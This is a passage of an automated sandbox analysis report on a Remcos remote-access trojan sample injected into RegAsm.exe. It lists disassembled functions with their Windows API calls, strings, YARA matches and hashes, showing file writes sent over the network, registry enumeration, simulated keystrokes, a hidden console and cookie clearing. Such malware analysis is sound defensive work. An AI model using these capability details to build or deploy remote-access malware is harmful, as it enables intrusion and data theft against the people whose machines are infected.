                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                • String ID: PkG$XMG$NG$NG
                                                                • API String ID: 1649129571-3151166067
                                                                • Opcode ID: ad24df347d0372f3bcd0a455a481e024bc46b11d98dd265ab576ac300c6fc75c
                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                • Opcode Fuzzy Hash: ad24df347d0372f3bcd0a455a481e024bc46b11d98dd265ab576ac300c6fc75c
                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID: .part
                                                                • API String ID: 1303771098-3499674018
                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$Window$AllocOutputShow
                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                • API String ID: 4067487056-3820604032
                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendInput.USER32 ref: 00419A25
                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InputSend$Virtual
                                                                • String ID:
                                                                • API String ID: 1167301434-0
                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$h{D
                                                                • API String ID: 2936374016-2303565833
                                                                • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • _free.LIBCMT ref: 00444E87
                                                                • _free.LIBCMT ref: 00444E9E
                                                                • _free.LIBCMT ref: 00444EBD
                                                                • _free.LIBCMT ref: 00444ED8
                                                                • _free.LIBCMT ref: 00444EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID: KED
                                                                • API String ID: 3033488037-2133951994
                                                                • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]$xUG$TG
                                                                • API String ID: 3554306468-1165877943
                                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                • __fassign.LIBCMT ref: 1000954F
                                                                • __fassign.LIBCMT ref: 1000956A
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                • __fassign.LIBCMT ref: 0044B514
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: xUG$NG$NG$TG
                                                                • API String ID: 3114080316-2811732169
                                                                • Opcode ID: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                • Opcode Fuzzy Hash: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 3286818993-122982132
                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                • Opcode ID: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                • Opcode Fuzzy Hash: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                • _free.LIBCMT ref: 100092AB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100092B6
                                                                • _free.LIBCMT ref: 100092C1
                                                                • _free.LIBCMT ref: 10009315
                                                                • _free.LIBCMT ref: 10009320
                                                                • _free.LIBCMT ref: 1000932B
                                                                • _free.LIBCMT ref: 10009336
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                • _free.LIBCMT ref: 00450FC8
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450FD3
